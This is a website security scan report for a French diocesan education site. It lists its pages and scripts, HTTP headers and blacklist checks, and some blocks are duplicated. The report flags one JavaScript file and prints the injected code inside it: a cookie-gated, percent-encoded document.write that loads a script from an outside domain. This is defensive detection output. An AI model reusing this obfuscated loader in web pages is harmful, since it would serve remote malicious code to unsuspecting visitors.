Scanned pages/files
Request | Server response | Status |
http://ddec07.fr/ | 200 OK Content-Length: 10239 Content-Type: text/html | clean |
http://ddec07.fr/templates/1/javascripts/swfobject_2.1.js | 200 OK Content-Length: 9759 Content-Type: text/javascript | clean |
http://ddec07.fr/templates/1/javascripts/pngfix/pngfix_1.0.js | 200 OK Content-Length: 488 Content-Type: text/javascript | clean |
http://ddec07.fr/templates/1/javascripts/IE6_belatedPNG.js | 200 OK Content-Length: 12927 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var DD_belatedPNG = { ns: 'DD_belatedPNG', imgSize: {}, delay: 10, nodesFixed: 0, createVmlNameSpace: function () { if (document.namespaces && !document.namespaces[this.ns]) { document.namespaces.add(this.ns, 'urn:schemas-microsoft-com:vml'); } }, createVmlStyleSheet: function () { var screenStyleSheet, printStyleSheet; screenStyleSheet = document.createElement('style'); screenStyleSheet.setAttribute('media' if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://ddec07.fr/templates/1/javascripts/prototype_1.6.0.3.js | 200 OK Content-Length: 129738 Content-Type: text/javascript | clean |
http://ddec07.fr/templates/1/javascripts/functions_index.js | 200 OK Content-Length: 2270 Content-Type: text/javascript | clean |
http://ddec07.fr/templates/1/javascripts/scriptaculous/scriptaculous.js?load=builder,effects | 200 OK Content-Length: 2654 Content-Type: text/javascript | clean |
http://ddec07.fr/pages/fr/51/extranet-acces-protege.html | 200 OK Content-Length: 39571 Content-Type: text/html | clean |
http://ddec07.fr/templates/1/javascripts/jquery-1.3.2.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://ddec07.fr/templates/1/javascripts/functions.js | 200 OK Content-Length: 2898 Content-Type: text/javascript | clean |
http://ddec07.fr/pages/fr/1/enseignement-catholique-en-ardeche-direction-diocesaine.html | 200 OK Content-Length: 10257 Content-Type: text/html | clean |
http://ddec07.fr/pages/fr/36/comment-venir-a-la-ddec-de-l-ardeche.html | 200 OK Content-Length: 42023 Content-Type: text/html | clean |
http://ddec07.fr/pages/fr/17/les-missions-de-la-ddec-pour-coordonner-l-enseignement-catholique.html | 200 OK Content-Length: 43079 Content-Type: text/html | clean |
http://ddec07.fr/pages/fr/43/organisation-diocesaine-pour-l-enseignement-prive-catholique.html | 200 OK Content-Length: 40638 Content-Type: text/html | clean |
http://ddec07.fr/pages/fr/52/organigramme.html | 200 OK Content-Length: 38996 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ddec07.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 10 Oct 2014 14:51:26 GMT
Pragma: no-cache
Server: Apache/2.2.15 (CentOS)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=oo8lu2lh3l6dob9utocbsdtcg1; path=/
X-Powered-By: PHP/5.4.20
GET / HTTP/1.1
Host: ddec07.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 10 Oct 2014 14:51:26 GMT
Pragma: no-cache
Server: Apache/2.2.15 (CentOS)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=oo8lu2lh3l6dob9utocbsdtcg1; path=/
X-Powered-By: PHP/5.4.20
Second query (visit from search engine):
GET / HTTP/1.1
Host: ddec07.fr
Referer: http://www.google.com/search?q=ddec07.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ddec07.fr
Referer: http://www.google.com/search?q=ddec07.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ddec07.fr
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ddec07.fr/
Result: ddec07.fr is not infected or malware details are not published yet.
Result: ddec07.fr is not infected or malware details are not published yet.